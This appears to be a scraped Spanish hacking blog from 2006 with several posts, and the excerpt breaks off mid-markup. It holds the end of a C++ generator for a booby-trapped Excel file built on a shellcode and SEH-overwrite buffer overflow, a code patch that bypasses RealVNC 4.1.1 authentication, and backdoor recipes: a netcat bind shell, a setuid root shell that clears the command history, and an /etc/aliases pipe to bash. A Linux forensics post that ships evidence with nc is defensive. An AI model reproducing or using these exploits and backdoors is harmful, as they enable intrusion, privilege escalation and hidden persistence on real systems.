0x00,<br />0x74, 0x00, 0x20, 0x00, 0x45,<br /> 0x00, 0x6E, 0x00, 0x74, 0x00, 0x72, 0x00, 0x79, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x16, 0x00, 0x05, 0x00, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFE, 0xFF,<br />0xFF, 0xFF, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00, 0x6F, 0x00, 0x72, 0x00,<br />0x6B, 0x00, 0x62, 0x00, 0x6F,<br /> 0x00, 0x6F, 0x00, 0x6B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x02, 0x00, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x8B, 0x1A, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,<br />0x00, 0x00, 0x00, 0x00, 0x00,<br /> 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00,<br />0x00, 0x00, 0x03, 0x00, 0x00,<br /> 0x00, 0x04, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x06, 0x00,<br />0x00, 0x00, 0x07, 0x00, 0x00,<br /> 0x00, 0x08, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x0A, 0x00,<br />0x00, 0x00, 0x0B, 0x00, 0x00,<br /> 0x00, 0x0C, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0xFE, 0xFF,<br />0xFF, 0xFF, 0xFE, 0xFF, 0xFF,<br /> 0xFF, 0xFD, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br />0xFF, 0xFF, 0xFF, 0xFF, 0xFF,<br /> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF<br />};<br /><br />char *filename="ExcelPOC.xls";<br /><br />int main()<br />{<br /> ofstream ofs;<br /><br /> ofs.open(filename,ios::binary | ios::out);<br /><br /> printf("Generating Excel File ...\n\n");<br /><br /> for(int z=0;z<sizeof(stream1);z++)<br /> ofs.put(stream1[z]);<br /><br /> ofs.put('\x2E'); // Buffer size , that we are going to fill = 0x152E<br /> ofs.put('\x15');<br /> ofs.put('\0');<br /> ofs.put('\0');<br /><br /><br /> for(int i=0;i<=seh_off;i++)<br /> ofs.put('\x90');<br /><br /> ofs.put('\xEB');<br /> ofs.put('\x06');<br /> ofs.put('\x90');<br /> ofs.put('\x90');<br /><br /> for(z=0;z<4;z++)<br /> ofs.put(ret_address[3-z]);<br /><br /> ofs.put('\x90');<br /> i+=9;<br /><br /> for(unsigned int j=0;j<strlen((const char*)shellcode);i++,j++)<br /> ofs.put(shellcode[j]);<br /><br /> for(;i<=buff_size-4;i++)<br /> ofs.put('\x90');<br /><br /> for(z=0;z<sizeof(stream2);z++)<br /> ofs.put(stream2[z]);<br /><br /> ofs.close();<br /><br /> printf("File Written ...\n\n");<br /> return 0;<br />}<o:p></o:p></span></p> </td></tr></tbody></table><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115100285056253377?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com0tag:blogger.com,1999:blog-29362263.post-1150669820554932012006-06-19T00:17:00.000+02:002006-06-19T15:15:53.800+02:00Análisis forense - Linux: Adquisición de datos VolátilesLos <span style="font-style: italic;">"Datos Volátiles"</span>, son aquellos que desaparecen cuando un sistema se apaga o se reinicia, por lo que extraer la máxima información de estos datos, puesto que es muy importante a la hora de recopilar pruebas cuando un sistema ha sido comprometido. Espero que este post os sea de ayuda!<br /><br />Para recojer estos datos, es muy importante que en el equipo atacado, no ejecutemos ningún comando o herramienta por peligro a que pueda haber sido troyanizada. Para ello procederemos a ejecutar los binarios compilados estáticamente directamente desde un CD-ROM.<br /><br />Para empezar, utilizaremos un equipo no comprometido para el almacenamiento de las pruebas en red, esto lo haremos ejecutando el siguiente comando en el equipo:<br /><br /><span style="color: rgb(0, 0, 0); font-style: italic;"><span style="font-weight: bold;">nc -l -p 9000 > data.dat</span><br /><br /></span><span style="color: rgb(0, 0, 0);">Así, pondremos a la escucha un puerto donde le iremos enviando la información desde la máquina comprometida.</span><span style="color: rgb(0, 0, 0); font-style: italic;"><br /></span><br />Procederemos a listar los ficheros abiertos por los procesos para así detectar algún proceso/fichero sospechoso:<br /><br /><span style="font-style: italic;"> <span style="font-weight: bold;">/mnt/cdrom/lsof -n | /mnt/cdrom/nc -w 3 IP 9000</span></span><br /><br /><span style="font-style: italic;"><br /></span>Listamos las conexiones establecidas por los procesos:<br /><span style="font-style: italic;"> <br /><span style="font-weight: bold;"> /mnt/cdrom/netstat -nap | /mnt/cdrom/nc -w 3 IP 9000</span></span><br /><br />Además, listamos la tabla de rutas:<br /><span style="font-style: italic;"> <span style="font-weight: bold;">/mnt/cdrom/netstat -nr | /mnt/cdrom/nc -w 3 IP 9000</span></span><br /><br />Es importante hacer un análisis de puertos desde una máquina externa i compararla con la salida de netstat para poder asegurarnos que no hemos perdido de vista ningún proceso escuchando en ningún puerto, para ello usaremos <span style="font-style: italic;">nmap:<br /><br /> <span style="font-weight: bold;">nmap -sS -p 1- IP_COMPROMETIDO</span></span><br /><br />Listamos los ficheros que han sido eliminados pero que aún siguen abiertos por algún proceso en ejecución, esta utilidad, la encontraremos en el conjunto de herramientas de análisis forense <a href="http://www.porcupine.org/forensics/tct.html">The Coroner's Toolkit:</a><br /><br /><span style="font-style: italic;"> <span style="font-weight: bold;">/mnt/cdrom/ils -o /dev/hda1 | /mnt/cdrom/nc -w 3 IP 9000</span></span><br /><br />Listamos los procesos en ejecución:<br /><br /><span style="font-style: italic;"> <span style="font-weight: bold;">/mnt/cdrom/ps -el | /mnt/cdrom/nc -w 3 IP 9000</span></span><br /><br />Si mediante la orden anterior, encontráramos algún proceso sospechoso, podríamos analizarlo con la siguiente herramienta (también disponible en <a href="http://www.porcupine.org/forensics/tct.html">The Coroner's Toolkit</a>).<br /><br /><span style="font-style: italic;"> <span style="font-weight: bold;">/mnt/cdrom/pcat </span></span><pid><span style="font-style: italic; font-weight: bold;"> | /mnt/cdrom/nc -w 3 IP 9000</span><br /><br />Listaremos los usuarios conectados en el sistema:<br /><br /><span style="font-style: italic;"> <span style="font-weight: bold;">/mnt/cdrom/who -uHl | /mnt/cdrom/nc -w 3 IP 9000</span></span><br /><br /><br />Para finalizar guardamos el proc, en el cual obtendremos información acerca de los procesos:<br /><br /><span style="font-style: italic; font-weight: bold;">/mnt/cdrom/tar cf - /proc | /mnt/cdrom/nc -w 3 IP 9000</span><br /><br />Con estos pasos, habremos recopilado mucha información acerca de la intrusión. Para hacer un análisis más exaustivo, habríamos de recopilar datos no volátiles mediante herramientas de Integridad de Ficheros, localización de ficheros borrados, tiempos MAC, etc... de los cuales hablaré en un siguiente post.<br /><br /><br />Referencias:<br />Know your enemy:: Honeynet Project</pid><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115066982055493201?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com0tag:blogger.com,1999:blog-29362263.post-1150497743209566032006-06-17T00:28:00.000+02:002006-06-19T08:37:46.500+02:00Prueba de Concepto: explotar el fallo de autentificación del servidor VNC de RealVNC 4.1.1.<o:p></o:p>Primero deberemos obtener las fuentes para poder modificarlas desde la web de RealVNC en este link: <a href="http://www.realvnc.com/cgi-bin/download.cgi">http://www.realvnc.com/cgi-bin/download.cgi</a> y descargándonos <b>VNC Free Edition Source Code for Java </b>Version 4.1. <p class="MsoNormal"><o:p> </o:p><br />Una vez obtenidas las fuentes, procederemos a modificarlas. Para ello accederemos al fichero <i style="">vnc-4_1-javasrc\java\rfb\CConnection.java</i>, editamos el fichero y accedemos a la linea 229, donde encontraremos el siguiente código:</p> <p class="MsoNormal"><o:p> <br /></o:p></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(230, 230, 230) none repeat scroll 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal"><span style="" lang="EN-GB"><span style=""> </span>if (secType != SecTypes.invalid) {<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><span style=""> </span><span style=""> </span>os.writeU8(secType);<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><span style=""> </span>os.flush();<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><span style=""> </span>vlog.debug("Choosing security type "+SecTypes.name(secType)+<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><span style=""> </span></span>"("+secType+")");<o:p></o:p></p> <p class="MsoNormal"><span style=""> </span>}<o:p></o:p></p> <p class="MsoNormal"><span style=""> </span>}<o:p></o:p></p> </td> </tr> </tbody></table> <p class="MsoNormal"><o:p> </o:p><br />Pues bien, este exploit es tan simple como añadir la siguiente línea:</p> <p class="MsoNormal"><o:p> </o:p></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(230, 230, 230) none repeat scroll 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal"><span style=""> </span><span style="" lang="EN-GB">if (secType != SecTypes.invalid) {<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><span style=""> </span><b style="">secType = SecTypes.none;<o:p></o:p></b></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><span style=""> </span>os.writeU8(secType);<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><span style=""> </span>os.flush();<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><span style=""> </span>vlog.debug("Choosing security type "+SecTypes.name(secType)+<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><span style=""> </span></span>"("+secType+")");<o:p></o:p></p> <p class="MsoNormal"><span style=""> </span>}<o:p></o:p></p> <p class="MsoNormal"><span style=""> </span>}</p> </td> </tr> </tbody></table> <p class="MsoNormal"><o:p><br /> </o:p><br />Voilá, ahora solo tenemos que compilar y ejecutar vncviewer mediante:</p> <p class="MsoNormal"><o:p> </o:p></p><p class="MsoNormal"><i style="">java.exe -jar vnc-4_1-javasrc\java\vncviewer.jar<o:p></o:p></i></p> <p class="MsoNormal"><i style=""><o:p> </o:p></i></p><p class="MsoNormal">La autentificación se salta y accedemos al equipo.<o:p></o:p></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115049774320956603?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com2tag:blogger.com,1999:blog-29362263.post-1150496067444420332006-06-17T00:14:00.002+02:002008-02-20T01:01:31.597+01:00Abriendo una puerta trasera: algunos métodos con más o menos dificultad<o:p></o:p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><o:p> </o:p></p>Cuando un <i style="">hacker</i> penetra en un sistema debido a una falla de seguridad, o cuando momentáneamente poseemos privilegios de <i style="">root,</i> muchas veces se tiene la necesidad de “garantizar” un posible retorno a dicho sistema. Existen varios métodos para crear lo que se llama una <i style="">puerta trasera o backdoor </i>por la que se pueda acceder a él. A continuación os explicaré unos cuantos más o menos complicados. <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">El método más simple para crear una puerta trasera es mediante la utilización de Netcat. <a name="introduccion"></a></p> <p class="MsoNormal"><span style="">Netcat es una herramienta GNU la cual nos permite leer y escribir a través de conexiones de red utilizando los protocolos TCP o UDP. </span></p> <p class="MsoNormal"><span style=""> </span></p> <p class="MsoNormal">Pues bien Netcat nos ofrece una opción “-e” la cual nos asocia un programa a la conexión que establecemos:</p> <p class="MsoNormal"><o:p> </o:p></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"><pre><span style="" lang="EN-GB">$ nc -l<span style=""> </span>localhost -p 1234 -e /bin/bash<o:p></o:p></span></pre></td> </tr> </tbody></table> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal">Ésta es sin duda, la forma más simple que conozco para crear una puerta trasera. Solamente necesitaríamos establecer conexión mediante telnet a máquina comprometida al puerto 1234 y obtendríamos una shell.</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Los 2 siguientes métodos que os voy a describir son un tanto anticuados, pero por eso no dejan de ser curiosos.</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Para éste <i style="">backdoor</i>, emplearemos un poco de programación en <i style="">C</i>. Para ello, haremos uso de éste simple programa, os recuerdo que para que este código funcione deberéis ser usuario <i>root.</i></p> <p class="MsoNormal"><o:p> </o:p></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">#include <unistd.h><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">#include <stdlib.h><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">main (){<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">char *cad[2];<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">cad[0]="/bin/bash";<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">cad[1]=NULL;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">unsetenv("HISTSIZE"); //eliminamos el historial<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">setuid(0);<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">setgid(0);<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">execve(cad[0], cad, NULL);<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span style="font-size:10;">return 0;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span style="font-size:10;">}<o:p></o:p></span></p> <p class="MsoNormal"><o:p> </o:p></p> </td> </tr> </tbody></table> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Compilamos el código: </p> <p class="MsoNormal"><i><span style="" lang="EN-GB">$ gcc back.c –o back</span></i><span style="" lang="EN-GB"><o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal">Una vez compilado, deberemos activar el bit de setuid del fichero resultante de la compilación de este modo: </p> <p class="MsoNormal"><i>$ chmod +s back<o:p></o:p></i></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Así, si entramos al sistema como un usuario normal, nada más tendremos que ejecutar el <i>./back</i> para obtener privilegios de <i>root.</i></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">En éste método haremos uso del fichero <i style="">/etc/aliases o /etc/mail/aliases </i>en el cual se encuentran todas las redirecciones a las cuentas de correo creadas en el sistema, el fichero tiene esta estructura:</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">usenet:<span style=""> </span>news<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">ftpadm:<span style=""> </span>ftp<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">ftpadmin:<span style=""> </span>ftp<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">ftp-adm:<span style=""> </span>ftp<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">ftp-admin:<span style=""> </span>ftp<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">hostmaster:<span style=""> </span>root<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">mail:<span style=""> </span>postmaster<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span style="font-size:10;">postman:<span style=""> </span>postmaster<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span style="font-size:10;">post_office:<span style=""> </span>postmaster<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal">Como se puede ver, se redirigen los mails que llegan a las cuentas de la izquierda a las de la derecha. Siguiendo este formato, es posible redirigir también un mensaje a una instrucción de shell:</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal" style="margin-left: 18pt;"><span style="font-size:10;">post_office:<span style=""> </span>“|/bin/bash”<o:p></o:p></span></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">También podríamos redirigir el correo a cualquier otro comando. Ahora, solamente tenemos que enviar un correo especialmente formado para que al enviarlo a la cuenta <i style="">post_office</i> se procese línea a línea por la shell. El correo podría tener este aspecto:</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">#!/bin/bash<o:p></o:p></span></p> <p 